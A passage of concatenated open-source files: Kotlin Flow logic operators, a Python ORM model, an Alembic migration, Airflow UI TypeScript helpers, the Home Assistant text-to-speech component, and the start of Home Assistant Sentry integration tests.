@file:JvmName("FlowKt")
package kotlinx.coroutines.flow
import kotlinx.coroutines.*
import kotlin.jvm.*
/**
* A terminal operator that returns `true` and immediately cancels the flow
* if at least one element matches the given [predicate].
*
* If the flow does not emit any elements or no element matches the predicate, the function returns `false`.
*
* Equivalent to `!all { !predicate(it) }` (see [Flow.all]) and `!none { predicate(it) }` (see [Flow.none]).
*
* Example:
*
* ```
* val myFlow = flow {
* repeat(10) {
* emit(it)
* }
* throw RuntimeException("You still didn't find the required number? I gave you ten!")
* }
* println(myFlow.any { it > 5 }) // true
* println(flowOf(1, 2, 3).any { it > 5 }) // false
* ```
*
* @see Iterable.any
* @see Sequence.any
*/
public suspend fun <T> Flow<T>.any(predicate: suspend (T) -> Boolean): Boolean {
    var matched = false
    collectWhile { element ->
        if (predicate(element)) {
            matched = true
            false // a match was found: stop collecting
        } else {
            true // keep looking
        }
    }
    return matched
}
/**
* A terminal operator that returns `true` if all elements match the given [predicate],
* or returns `false` and cancels the flow as soon as the first element not matching the predicate is encountered.
*
* If the flow terminates without emitting any elements, the function returns `true` because there
* are no elements in it that *do not* match the predicate.
* See a more detailed explanation of this logic concept in the
* ["Vacuous truth"](https://en.wikipedia.org/wiki/Vacuous_truth) article.
*
* Equivalent to `!any { !predicate(it) }` (see [Flow.any]) and `none { !predicate(it) }` (see [Flow.none]).
*
* Example:
*
* ```
* val myFlow = flow {
* repeat(10) {
* emit(it)
* }
* throw RuntimeException("You still didn't find the required number? I gave you ten!")
* }
* println(myFlow.all { it <= 5 }) // false
* println(flowOf(1, 2, 3).all { it <= 5 }) // true
* ```
*
* @see Iterable.all
* @see Sequence.all
*/
public suspend fun <T> Flow<T>.all(predicate: suspend (T) -> Boolean): Boolean {
    var allSatisfied = true
    collectWhile { element ->
        if (predicate(element)) {
            true // keep checking
        } else {
            allSatisfied = false
            false // counterexample found: stop collecting
        }
    }
    return allSatisfied
}
/**
* A terminal operator that returns `true` if no elements match the given [predicate],
* or returns `false` and cancels the flow as soon as the first element matching the predicate is encountered.
*
* If the flow terminates without emitting any elements, the function returns `true` because there
* are no elements in it that match the predicate.
* See a more detailed explanation of this logic concept in the
* ["Vacuous truth"](https://en.wikipedia.org/wiki/Vacuous_truth) article.
*
* Equivalent to `!any(predicate)` (see [Flow.any]) and `all { !predicate(it) }` (see [Flow.all]).
*
* Example:
* ```
* val myFlow = flow {
* repeat(10) {
* emit(it)
* }
* throw RuntimeException("You still didn't find the required number? I gave you ten!")
* }
* println(myFlow.none { it > 5 }) // false
* println(flowOf(1, 2, 3).none { it > 5 }) // true
* ```
*
* @see Iterable.none
* @see Sequence.none
*/
public suspend fun <T> Flow<T>.none(predicate: suspend (T) -> Boolean): Boolean {
    // An element matching the predicate exists iff `any` returns true.
    return !any(predicate)
}
|
kotlin
|
github
|
https://github.com/Kotlin/kotlinx.coroutines
|
kotlinx-coroutines-core/common/src/flow/terminal/Logic.kt
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'xieshaoxin'
from transwrap.db import next_id
from transwrap.orm import FloatField,Model,StringField,BooleanFiled,IntegerField,TextField
import time
class User(Model):
    """ORM mapping for the ``user`` table."""
    __table__ = 'user'
    # BUG FIX: `default=next_id()` called the function once at class
    # definition time, so every inserted row shared the same "default" id.
    # Pass the callable itself so a fresh id is generated per insert,
    # matching the `default=time.time` pattern used below.
    id = StringField(primary_key=True, default=next_id, type="varchar(50)")
    name = StringField(type='varchar(50)')
    email = StringField(updatable=False, type='varchar(50)')
    admin = BooleanFiled()
    passwd = StringField(type="varchar(50)")
    created_at = FloatField(updatable=False, default=time.time)
    image = StringField(type='varchar(500)')
class Blog(Model):
    """ORM mapping for the ``blog`` table."""
    __table__ = 'blog'
    # BUG FIX: pass next_id as a callable (was `next_id()`, evaluated once
    # at import time so all rows shared one default id).
    id = StringField(primary_key=True, default=next_id, type="varchar(50)")
    user_id = StringField(updatable=False, type="varchar(50)")
    user_name = StringField(type='varchar(50)')
    user_image = StringField(type='varchar(500)')
    summary = StringField(type='varchar(200)')
    name = StringField(type="varchar(50)")
    content = TextField()
    created_at = FloatField(updatable=False, default=time.time)
class Comment(Model):
    """ORM mapping for the ``comment`` table."""
    __table__ = 'comment'
    # BUG FIX: pass next_id as a callable (was `next_id()`, evaluated once
    # at import time so all rows shared one default id).
    id = StringField(primary_key=True, default=next_id, type="varchar(50)")
    user_id = StringField(updatable=False, type="varchar(50)")
    user_name = StringField(type='varchar(50)')
    user_image = StringField(type='varchar(500)')
    blog_id = StringField(updatable=False, type="varchar(50)")
    content = TextField()
    created_at = FloatField(updatable=False, default=time.time)
if __name__ == '__main__':
    # Parenthesized print works under both Python 2 (as an expression) and
    # Python 3 (as a function call); the bare `print X` form only parses
    # on Python 2.
    # NOTE(review): User is printed via an instance while Blog/Comment use
    # the class directly -- presumably both forms work; confirm which is
    # intended.
    print(User().__sql__())
    print(Blog.__sql__())
    print(Comment.__sql__())
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2016 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""audit support
Revision ID: 2ff0a0e360f1
Revises: 22f5385a3d50
Create Date: 2016-06-02 15:14:31.888078
"""
# flake8: noqa: E402
# revision identifiers, used by Alembic.
revision = '2ff0a0e360f1'
down_revision = '22f5385a3d50'
from alembic import op
import sqlalchemy as sa
def upgrade(active_plugins=None, options=None):
    """Add nullable audit timestamp columns to the vims/vnf/vnfd tables."""
    audit_columns = ('created_at', 'updated_at')
    for table in ('vims', 'vnf', 'vnfd'):
        for column_name in audit_columns:
            op.add_column(
                table, sa.Column(column_name, sa.DateTime(), nullable=True))
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*!
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import type { GridNodeResponse, NodeResponse } from "openapi/requests/types.gen";
export type GridTask = {
  depth: number;
  isGroup?: boolean;
  isOpen?: boolean;
} & GridNodeResponse;

// Flatten the grid node tree into a display list, descending into a group's
// children only when that group's id is listed in `openGroupIds`.  Also
// collects the ids of every group encountered (open or not).
export const flattenNodes = (
  nodes: Array<GridNodeResponse> | undefined,
  openGroupIds: Array<string>,
  depth: number = 0,
) => {
  const flatNodes: Array<GridTask> = [];
  const allGroupIds: Array<string> = [];

  (nodes ?? []).forEach((node) => {
    if (node.children) {
      const { children, ...rest } = node;
      const isOpen = openGroupIds.includes(node.id);

      flatNodes.push({ ...rest, depth, isGroup: true, isOpen });
      allGroupIds.push(node.id);

      const childResult = flattenNodes(children, openGroupIds, depth + 1);

      // Closed groups still contribute their descendant group ids, but
      // their rows are not rendered.
      if (isOpen) {
        flatNodes.push(...childResult.flatNodes);
      }
      allGroupIds.push(...childResult.allGroupIds);
    } else {
      flatNodes.push({ ...node, depth });
    }
  });

  return { allGroupIds, flatNodes };
};
/** Collect the ids of every group (node with children) in a graph-node tree. */
export const flattenGraphNodes = (
  nodes: Array<NodeResponse>,
  depth: number = 0,
): { allGroupIds: Array<string> } => {
  const allGroupIds: Array<string> = [];

  nodes.forEach((node) => {
    if (!node.children) {
      return;
    }
    allGroupIds.push(node.id);

    const nested = flattenGraphNodes(node.children, depth + 1);

    allGroupIds.push(...nested.allGroupIds);
  });

  return { allGroupIds };
};
|
typescript
|
github
|
https://github.com/apache/airflow
|
airflow-core/src/airflow/ui/src/layouts/Details/Grid/utils.ts
|
"""Provide functionality to TTS."""
import asyncio
import ctypes
import functools as ft
import hashlib
import io
import logging
import mimetypes
import os
import re
from aiohttp import web
import voluptuous as vol
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.media_player.const import (
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
MEDIA_TYPE_MUSIC,
SERVICE_PLAY_MEDIA,
)
from homeassistant.components.media_player.const import DOMAIN as DOMAIN_MP
from homeassistant.const import ATTR_ENTITY_ID, ENTITY_MATCH_ALL, CONF_PLATFORM
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform
import homeassistant.helpers.config_validation as cv
from homeassistant.setup import async_prepare_setup_platform
_LOGGER = logging.getLogger(__name__)
# Service-call attribute names.
ATTR_CACHE = "cache"
ATTR_LANGUAGE = "language"
ATTR_MESSAGE = "message"
ATTR_OPTIONS = "options"
ATTR_PLATFORM = "platform"
# Configuration keys.
CONF_BASE_URL = "base_url"
CONF_CACHE = "cache"
CONF_CACHE_DIR = "cache_dir"
CONF_LANG = "language"
CONF_SERVICE_NAME = "service_name"
CONF_TIME_MEMORY = "time_memory"
DEFAULT_CACHE = True
DEFAULT_CACHE_DIR = "tts"
DEFAULT_TIME_MEMORY = 300  # seconds a voice stays in the in-memory cache
DOMAIN = "tts"
MEM_CACHE_FILENAME = "filename"
MEM_CACHE_VOICE = "voice"
SERVICE_CLEAR_CACHE = "clear_cache"
SERVICE_SAY = "say"
# Cached voice file name: <sha1-of-message>_<language>_<options-hash>_<engine>.<ext>
_RE_VOICE_FILE = re.compile(r"([a-f0-9]{40})_([^_]+)_([^_]+)_([a-z_]+)\.[a-z0-9]{3,4}")
# Cache key built from the same four components (no extension).
KEY_PATTERN = "{0}_{1}_{2}_{3}"
def _deprecated_platform(value):
"""Validate if platform is deprecated."""
if value == "google":
raise vol.Invalid(
"google tts service has been renamed to google_translate,"
" please update your configuration."
)
return value
# Per-platform configuration: platform name (with google-rename check),
# cache toggle/dir and the in-memory retention window (60 s .. 16 h).
PLATFORM_SCHEMA = cv.PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_PLATFORM): vol.All(cv.string, _deprecated_platform),
        vol.Optional(CONF_CACHE, default=DEFAULT_CACHE): cv.boolean,
        vol.Optional(CONF_CACHE_DIR, default=DEFAULT_CACHE_DIR): cv.string,
        vol.Optional(CONF_TIME_MEMORY, default=DEFAULT_TIME_MEMORY): vol.All(
            vol.Coerce(int), vol.Range(min=60, max=57600)
        ),
        vol.Optional(CONF_BASE_URL): cv.string,
        vol.Optional(CONF_SERVICE_NAME): cv.string,
    }
)
PLATFORM_SCHEMA_BASE = cv.PLATFORM_SCHEMA_BASE.extend(PLATFORM_SCHEMA.schema)
# Payload accepted by the per-platform "<platform>_say" services.
SCHEMA_SERVICE_SAY = vol.Schema(
    {
        vol.Required(ATTR_MESSAGE): cv.string,
        vol.Optional(ATTR_CACHE): cv.boolean,
        vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids,
        vol.Optional(ATTR_LANGUAGE): cv.string,
        vol.Optional(ATTR_OPTIONS): dict,
    }
)
# clear_cache takes no parameters.
SCHEMA_SERVICE_CLEAR_CACHE = vol.Schema({})
async def async_setup(hass, config):
    """Set up TTS.

    Creates the shared SpeechManager, registers the HTTP views, sets up
    every configured platform (each registering its own say service) and
    registers the global clear_cache service. Returns False if the cache
    directory cannot be initialized.
    """
    tts = SpeechManager(hass)
    try:
        # Only the first [tts] config block is honored.
        conf = config[DOMAIN][0] if config.get(DOMAIN, []) else {}
        use_cache = conf.get(CONF_CACHE, DEFAULT_CACHE)
        cache_dir = conf.get(CONF_CACHE_DIR, DEFAULT_CACHE_DIR)
        time_memory = conf.get(CONF_TIME_MEMORY, DEFAULT_TIME_MEMORY)
        base_url = conf.get(CONF_BASE_URL) or hass.config.api.base_url
        await tts.async_init_cache(use_cache, cache_dir, time_memory, base_url)
    except (HomeAssistantError, KeyError) as err:
        _LOGGER.error("Error on cache init %s", err)
        return False
    hass.http.register_view(TextToSpeechView(tts))
    hass.http.register_view(TextToSpeechUrlView(tts))
    async def async_setup_platform(p_type, p_config, disc_info=None):
        """Set up a TTS platform."""
        platform = await async_prepare_setup_platform(hass, config, DOMAIN, p_type)
        if platform is None:
            return
        try:
            # Prefer the async engine factory when the platform provides one.
            if hasattr(platform, "async_get_engine"):
                provider = await platform.async_get_engine(hass, p_config)
            else:
                provider = await hass.async_add_job(platform.get_engine, hass, p_config)
            if provider is None:
                _LOGGER.error("Error setting up platform %s", p_type)
                return
            tts.async_register_engine(p_type, provider, p_config)
        except Exception:  # pylint: disable=broad-except
            _LOGGER.exception("Error setting up platform: %s", p_type)
            return
        async def async_say_handle(service):
            """Service handle for say."""
            entity_ids = service.data.get(ATTR_ENTITY_ID, ENTITY_MATCH_ALL)
            message = service.data.get(ATTR_MESSAGE)
            cache = service.data.get(ATTR_CACHE)
            language = service.data.get(ATTR_LANGUAGE)
            options = service.data.get(ATTR_OPTIONS)
            try:
                url = await tts.async_get_url(
                    p_type, message, cache=cache, language=language, options=options
                )
            except HomeAssistantError as err:
                _LOGGER.error("Error on init TTS: %s", err)
                return
            # Hand the generated URL to the media players as a play_media call.
            data = {
                ATTR_MEDIA_CONTENT_ID: url,
                ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_MUSIC,
                ATTR_ENTITY_ID: entity_ids,
            }
            await hass.services.async_call(
                DOMAIN_MP, SERVICE_PLAY_MEDIA, data, blocking=True
            )
        # Service name defaults to "<platform>_say" unless overridden.
        service_name = p_config.get(
            CONF_SERVICE_NAME, "{}_{}".format(p_type, SERVICE_SAY)
        )
        hass.services.async_register(
            DOMAIN, service_name, async_say_handle, schema=SCHEMA_SERVICE_SAY
        )
    setup_tasks = [
        async_setup_platform(p_type, p_config)
        for p_type, p_config in config_per_platform(config, DOMAIN)
    ]
    if setup_tasks:
        await asyncio.wait(setup_tasks)
    async def async_clear_cache_handle(service):
        """Handle clear cache service call."""
        await tts.async_clear_cache()
    hass.services.async_register(
        DOMAIN,
        SERVICE_CLEAR_CACHE,
        async_clear_cache_handle,
        schema=SCHEMA_SERVICE_CLEAR_CACHE,
    )
    return True
class SpeechManager:
    """Representation of a speech store.

    Generated voice data is cached at two levels: an in-memory dict with a
    time-based eviction (time_memory seconds) and an optional on-disk file
    cache under cache_dir. Cache keys follow KEY_PATTERN.
    """
    def __init__(self, hass):
        """Initialize a speech store."""
        self.hass = hass
        self.providers = {}  # engine name -> Provider instance
        self.use_cache = DEFAULT_CACHE
        self.cache_dir = DEFAULT_CACHE_DIR
        self.time_memory = DEFAULT_TIME_MEMORY
        self.base_url = None
        self.file_cache = {}  # cache key -> filename on disk
        self.mem_cache = {}  # cache key -> {MEM_CACHE_FILENAME, MEM_CACHE_VOICE}
    async def async_init_cache(self, use_cache, cache_dir, time_memory, base_url):
        """Init config folder and load file cache.

        Raises HomeAssistantError if the cache dir cannot be created or read.
        """
        self.use_cache = use_cache
        self.time_memory = time_memory
        self.base_url = base_url
        def init_tts_cache_dir(cache_dir):
            """Init cache folder."""
            # Relative paths are resolved against the HA config directory.
            if not os.path.isabs(cache_dir):
                cache_dir = self.hass.config.path(cache_dir)
            if not os.path.isdir(cache_dir):
                _LOGGER.info("Create cache dir %s.", cache_dir)
                os.mkdir(cache_dir)
            return cache_dir
        try:
            # Blocking filesystem work runs in the executor.
            self.cache_dir = await self.hass.async_add_job(
                init_tts_cache_dir, cache_dir
            )
        except OSError as err:
            raise HomeAssistantError("Can't init cache dir {}".format(err))
        def get_cache_files():
            """Return a dict of given engine files."""
            cache = {}
            folder_data = os.listdir(self.cache_dir)
            for file_data in folder_data:
                # Only files matching the voice-file naming scheme are indexed.
                record = _RE_VOICE_FILE.match(file_data)
                if record:
                    key = KEY_PATTERN.format(
                        record.group(1),
                        record.group(2),
                        record.group(3),
                        record.group(4),
                    )
                    cache[key.lower()] = file_data.lower()
            return cache
        try:
            cache_files = await self.hass.async_add_job(get_cache_files)
        except OSError as err:
            raise HomeAssistantError("Can't read cache dir {}".format(err))
        if cache_files:
            self.file_cache.update(cache_files)
    async def async_clear_cache(self):
        """Read file cache and delete files."""
        self.mem_cache = {}
        def remove_files():
            """Remove files from filesystem."""
            for _, filename in self.file_cache.items():
                try:
                    os.remove(os.path.join(self.cache_dir, filename))
                except OSError as err:
                    # Best effort: a failed delete is logged, not raised.
                    _LOGGER.warning("Can't remove cache file '%s': %s", filename, err)
        await self.hass.async_add_job(remove_files)
        self.file_cache = {}
    @callback
    def async_register_engine(self, engine, provider, config):
        """Register a TTS provider."""
        provider.hass = self.hass
        if provider.name is None:
            provider.name = engine
        self.providers[engine] = provider
    async def async_get_url(
        self, engine, message, cache=None, language=None, options=None
    ):
        """Get URL for play message.
        This method is a coroutine.

        Raises HomeAssistantError for an unsupported language or invalid
        options; KeyError if the engine is not registered.
        """
        provider = self.providers[engine]
        msg_hash = hashlib.sha1(bytes(message, "utf-8")).hexdigest()
        # Explicit per-call cache flag overrides the configured default.
        use_cache = cache if cache is not None else self.use_cache
        # Languages
        language = language or provider.default_language
        if language is None or language not in provider.supported_languages:
            raise HomeAssistantError("Not supported language {0}".format(language))
        # Options: caller-supplied options are merged over provider defaults.
        if provider.default_options and options:
            merged_options = provider.default_options.copy()
            merged_options.update(options)
            options = merged_options
        options = options or provider.default_options
        if options is not None:
            invalid_opts = [
                opt_name
                for opt_name in options.keys()
                if opt_name not in (provider.supported_options or [])
            ]
            if invalid_opts:
                raise HomeAssistantError(
                    "Invalid options found: {}".format(invalid_opts)
                )
            # c_size_t keeps the hash non-negative so it is filename-safe.
            options_key = ctypes.c_size_t(hash(frozenset(options))).value
        else:
            options_key = "-"
        key = KEY_PATTERN.format(msg_hash, language, options_key, engine).lower()
        # Is speech already in memory
        if key in self.mem_cache:
            filename = self.mem_cache[key][MEM_CACHE_FILENAME]
        # Is file store in file cache
        elif use_cache and key in self.file_cache:
            filename = self.file_cache[key]
            # Warm the memory cache in the background.
            self.hass.async_create_task(self.async_file_to_mem(key))
        # Load speech from provider into memory
        else:
            filename = await self.async_get_tts_audio(
                engine, key, message, use_cache, language, options
            )
        return "{}/api/tts_proxy/{}".format(self.base_url, filename)
    async def async_get_tts_audio(self, engine, key, message, cache, language, options):
        """Receive TTS and store for view in cache.
        This method is a coroutine.

        Returns the generated filename; raises HomeAssistantError when the
        provider yields no audio.
        """
        provider = self.providers[engine]
        extension, data = await provider.async_get_tts_audio(message, language, options)
        if data is None or extension is None:
            raise HomeAssistantError("No TTS from {} for '{}'".format(engine, message))
        # Create file infos
        filename = ("{}.{}".format(key, extension)).lower()
        data = self.write_tags(filename, data, provider, message, language, options)
        # Save to memory
        self._async_store_to_memcache(key, filename, data)
        if cache:
            # Disk write happens in the background; the caller gets the name now.
            self.hass.async_create_task(self.async_save_tts_audio(key, filename, data))
        return filename
    async def async_save_tts_audio(self, key, filename, data):
        """Store voice data to file and file_cache.
        This method is a coroutine.
        """
        voice_file = os.path.join(self.cache_dir, filename)
        def save_speech():
            """Store speech to filesystem."""
            with open(voice_file, "wb") as speech:
                speech.write(data)
        try:
            await self.hass.async_add_job(save_speech)
            self.file_cache[key] = filename
        except OSError:
            _LOGGER.error("Can't write %s", filename)
    async def async_file_to_mem(self, key):
        """Load voice from file cache into memory.
        This method is a coroutine.

        Raises HomeAssistantError when the key is unknown or unreadable.
        """
        filename = self.file_cache.get(key)
        if not filename:
            raise HomeAssistantError("Key {} not in file cache!".format(key))
        voice_file = os.path.join(self.cache_dir, filename)
        def load_speech():
            """Load a speech from filesystem."""
            with open(voice_file, "rb") as speech:
                return speech.read()
        try:
            data = await self.hass.async_add_job(load_speech)
        except OSError:
            # Drop the stale index entry so we don't retry a missing file.
            del self.file_cache[key]
            raise HomeAssistantError("Can't read {}".format(voice_file))
        self._async_store_to_memcache(key, filename, data)
    @callback
    def _async_store_to_memcache(self, key, filename, data):
        """Store data to memcache and set timer to remove it."""
        self.mem_cache[key] = {MEM_CACHE_FILENAME: filename, MEM_CACHE_VOICE: data}
        @callback
        def async_remove_from_mem():
            """Cleanup memcache."""
            self.mem_cache.pop(key)
        # Evict after time_memory seconds.
        self.hass.loop.call_later(self.time_memory, async_remove_from_mem)
    async def async_read_tts(self, filename):
        """Read a voice file and return binary.
        This method is a coroutine.

        Returns (mime_type, data); raises HomeAssistantError for malformed
        filenames or unknown cache keys.
        """
        record = _RE_VOICE_FILE.match(filename.lower())
        if not record:
            raise HomeAssistantError("Wrong tts file format!")
        key = KEY_PATTERN.format(
            record.group(1), record.group(2), record.group(3), record.group(4)
        )
        if key not in self.mem_cache:
            if key not in self.file_cache:
                raise HomeAssistantError("{} not in cache!".format(key))
            await self.async_file_to_mem(key)
        content, _ = mimetypes.guess_type(filename)
        return (content, self.mem_cache[key][MEM_CACHE_VOICE])
    @staticmethod
    def write_tags(filename, data, provider, message, language, options):
        """Write ID3 tags to file.
        Async friendly.

        Returns the (possibly retagged) audio bytes; tagging failures are
        logged and the original data returned.
        """
        import mutagen
        data_bytes = io.BytesIO(data)
        data_bytes.name = filename
        data_bytes.seek(0)
        album = provider.name
        artist = language
        if options is not None:
            # A requested voice, when present, replaces the language as artist.
            if options.get("voice") is not None:
                artist = options.get("voice")
        try:
            tts_file = mutagen.File(data_bytes, easy=True)
            if tts_file is not None:
                tts_file["artist"] = artist
                tts_file["album"] = album
                tts_file["title"] = message
                tts_file.save(data_bytes)
        except mutagen.MutagenError as err:
            _LOGGER.error("ID3 tag error: %s", err)
        return data_bytes.getvalue()
class Provider:
    """Base class for a single TTS provider implementation.

    Subclasses override get_tts_audio (or async_get_tts_audio) and the
    capability properties below; all defaults report "nothing supported".
    """
    # Both are injected by SpeechManager.async_register_engine.
    hass = None
    name = None
    @property
    def default_language(self):
        """Language used when the caller requests none (None by default)."""
    @property
    def supported_languages(self):
        """Languages this provider can synthesize (None by default)."""
    @property
    def supported_options(self):
        """Option names (e.g. voice, emotion) this provider understands."""
    @property
    def default_options(self):
        """Options applied when the caller supplies none (None by default)."""
    def get_tts_audio(self, message, language, options=None):
        """Load TTS audio from the provider; must be overridden."""
        raise NotImplementedError()
    def async_get_tts_audio(self, message, language, options=None):
        """Load TTS audio from the provider without blocking the loop.

        Returns a coroutine yielding a (file extension, bytes) tuple; the
        sync get_tts_audio is dispatched onto an executor job.
        """
        job = ft.partial(self.get_tts_audio, message, language, options=options)
        return self.hass.async_add_job(job)
class TextToSpeechUrlView(HomeAssistantView):
    """TTS view to get a url to a generated speech file."""
    requires_auth = True
    url = "/api/tts_get_url"
    name = "api:tts:geturl"
    def __init__(self, tts):
        """Initialize a tts view with the shared SpeechManager."""
        self.tts = tts
    async def post(self, request):
        """Generate speech and provide url.

        Returns a JSON body with the proxy URL, or a 400 error message.
        """
        try:
            data = await request.json()
        except ValueError:
            return self.json_message("Invalid JSON specified", 400)
        # BUG FIX: both fields are mandatory. The original condition
        # `not platform and message` only rejected requests that were
        # missing the platform AND carried a message; a request with a
        # platform but no message fell through to a KeyError below.
        if not data.get(ATTR_PLATFORM) or not data.get(ATTR_MESSAGE):
            return self.json_message("Must specify platform and message", 400)
        p_type = data[ATTR_PLATFORM]
        message = data[ATTR_MESSAGE]
        cache = data.get(ATTR_CACHE)
        language = data.get(ATTR_LANGUAGE)
        options = data.get(ATTR_OPTIONS)
        try:
            url = await self.tts.async_get_url(
                p_type, message, cache=cache, language=language, options=options
            )
            resp = self.json({"url": url}, 200)
        except HomeAssistantError as err:
            _LOGGER.error("Error on init tts: %s", err)
            # str(err): exception objects are not JSON serializable.
            resp = self.json({"error": str(err)}, 400)
        return resp
class TextToSpeechView(HomeAssistantView):
    """TTS view to serve a speech audio."""
    requires_auth = False
    # BUG FIX: the route must capture {filename} so aiohttp passes it to
    # get(); SpeechManager.async_get_url hands out URLs of exactly this
    # shape ("{base_url}/api/tts_proxy/{filename}").
    url = "/api/tts_proxy/{filename}"
    name = "api:tts:speech"
    def __init__(self, tts):
        """Initialize a tts view with the shared SpeechManager."""
        self.tts = tts
    async def get(self, request, filename):
        """Start a get request.

        Serves the cached voice bytes, or 404 if the file is unknown.
        """
        try:
            content, data = await self.tts.async_read_tts(filename)
        except HomeAssistantError as err:
            _LOGGER.error("Error on load tts: %s", err)
            return web.Response(status=404)
        return web.Response(body=data, content_type=content)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Tests for Sentry integration."""
import logging
import pytest
from homeassistant.components.sentry import get_channel, process_before_send
from homeassistant.components.sentry.const import (
CONF_DSN,
CONF_ENVIRONMENT,
CONF_EVENT_CUSTOM_COMPONENTS,
CONF_EVENT_HANDLED,
CONF_EVENT_THIRD_PARTY_PACKAGES,
CONF_TRACING,
CONF_TRACING_SAMPLE_RATE,
DOMAIN,
)
from homeassistant.const import __version__ as current_version
from homeassistant.core import HomeAssistant
from tests.async_mock import MagicMock, Mock, patch
from tests.common import MockConfigEntry
async def test_setup_entry(hass: HomeAssistant) -> None:
    """Test integration setup from entry."""
    entry = MockConfigEntry(
        domain=DOMAIN,
        data={CONF_DSN: "http://public@example.com/1", CONF_ENVIRONMENT: "production"},
    )
    entry.add_to_hass(hass)
    with patch(
        "homeassistant.components.sentry.AioHttpIntegration"
    ) as sentry_aiohttp_mock, patch(
        "homeassistant.components.sentry.SqlalchemyIntegration"
    ) as sentry_sqlalchemy_mock, patch(
        "homeassistant.components.sentry.LoggingIntegration"
    ) as sentry_logging_mock, patch(
        "homeassistant.components.sentry.sentry_sdk"
    ) as sentry_mock:
        assert await hass.config_entries.async_setup(entry.entry_id)
        await hass.async_block_till_done()
    # Test CONF_ENVIRONMENT is migrated to entry options
    assert CONF_ENVIRONMENT not in entry.data
    assert CONF_ENVIRONMENT in entry.options
    assert entry.options[CONF_ENVIRONMENT] == "production"
    # BUG FIX: `assert mock.called_once_with(...)` never fails — a MagicMock
    # auto-creates `called_once_with` and returns a truthy mock. Use the real
    # assertion method instead (which also makes the call_count check above
    # redundant, kept for clarity).
    assert sentry_logging_mock.call_count == 1
    sentry_logging_mock.assert_called_once_with(
        level=logging.WARNING, event_level=logging.WARNING
    )
    assert sentry_aiohttp_mock.call_count == 1
    assert sentry_sqlalchemy_mock.call_count == 1
    assert sentry_mock.init.call_count == 1
    call_args = sentry_mock.init.call_args[1]
    assert set(call_args) == {
        "dsn",
        "environment",
        "integrations",
        "release",
        "before_send",
    }
    assert call_args["dsn"] == "http://public@example.com/1"
    assert call_args["environment"] == "production"
    assert call_args["integrations"] == [
        sentry_logging_mock.return_value,
        sentry_aiohttp_mock.return_value,
        sentry_sqlalchemy_mock.return_value,
    ]
    assert call_args["release"] == current_version
    assert call_args["before_send"]
async def test_setup_entry_with_tracing(hass: HomeAssistant) -> None:
    """Test integration setup from entry with tracing enabled."""
    entry = MockConfigEntry(
        domain=DOMAIN,
        data={CONF_DSN: "http://public@example.com/1"},
        options={CONF_TRACING: True, CONF_TRACING_SAMPLE_RATE: 0.5},
    )
    entry.add_to_hass(hass)
    with patch("homeassistant.components.sentry.AioHttpIntegration"), patch(
        "homeassistant.components.sentry.SqlalchemyIntegration"
    ), patch("homeassistant.components.sentry.LoggingIntegration"), patch(
        "homeassistant.components.sentry.sentry_sdk"
    ) as sentry_mock:
        assert await hass.config_entries.async_setup(entry.entry_id)
        await hass.async_block_till_done()
    # Enabling tracing must add exactly one extra init kwarg:
    # traces_sample_rate, carrying the configured sample rate.
    call_args = sentry_mock.init.call_args[1]
    assert set(call_args) == {
        "dsn",
        "environment",
        "integrations",
        "release",
        "before_send",
        "traces_sample_rate",
    }
    assert call_args["traces_sample_rate"] == 0.5
@pytest.mark.parametrize(
    "version,channel",
    [
        # date-stamped .dev builds -> nightly; plain releases -> stable;
        # bN suffix -> beta; devN without date -> dev.
        ("0.115.0.dev20200815", "nightly"),
        ("0.115.0", "stable"),
        ("0.115.0b4", "beta"),
        ("0.115.0dev0", "dev"),
    ],
)
async def test_get_channel(version, channel) -> None:
    """Test if channel detection works from Home Assistant version number."""
    assert get_channel(version) == channel
async def test_process_before_send(hass: HomeAssistant):
    """Test regular use of the Sentry process before sending function."""
    hass.config.components.add("puppies")
    hass.config.components.add("a_integration")
    # These should not show up in the result.
    hass.config.components.add("puppies.light")
    hass.config.components.add("auth")
    result = process_before_send(
        hass,
        options={},
        channel="test",
        huuid="12345",
        system_info={"installation_type": "pytest"},
        custom_components=["ironing_robot", "fridge_opener"],
        event={},
        hint={},
    )
    assert result
    assert result["tags"]
    assert result["contexts"]
    assert result["contexts"]
    # Component/custom-component lists are rendered sorted, one per line.
    ha_context = result["contexts"]["Home Assistant"]
    assert ha_context["channel"] == "test"
    assert ha_context["custom_components"] == "fridge_opener\nironing_robot"
    assert ha_context["integrations"] == "a_integration\npuppies"
    tags = result["tags"]
    assert tags["channel"] == "test"
    assert tags["uuid"] == "12345"
    assert tags["installation_type"] == "pytest"
    # The installation uuid doubles as the Sentry user id.
    user = result["user"]
    assert user["id"] == "12345"
async def test_event_with_platform_context(hass: HomeAssistant):
    """Test extraction of platform context information during Sentry events."""
    # Simulate an event raised while a built-in platform (hue/light) is active.
    current_platform_mock = Mock()
    current_platform_mock.get().platform_name = "hue"
    current_platform_mock.get().domain = "light"
    with patch(
        "homeassistant.components.sentry.entity_platform.current_platform",
        new=current_platform_mock,
    ):
        result = process_before_send(
            hass,
            options={},
            channel="test",
            huuid="12345",
            system_info={"installation_type": "pytest"},
            custom_components=["ironing_robot"],
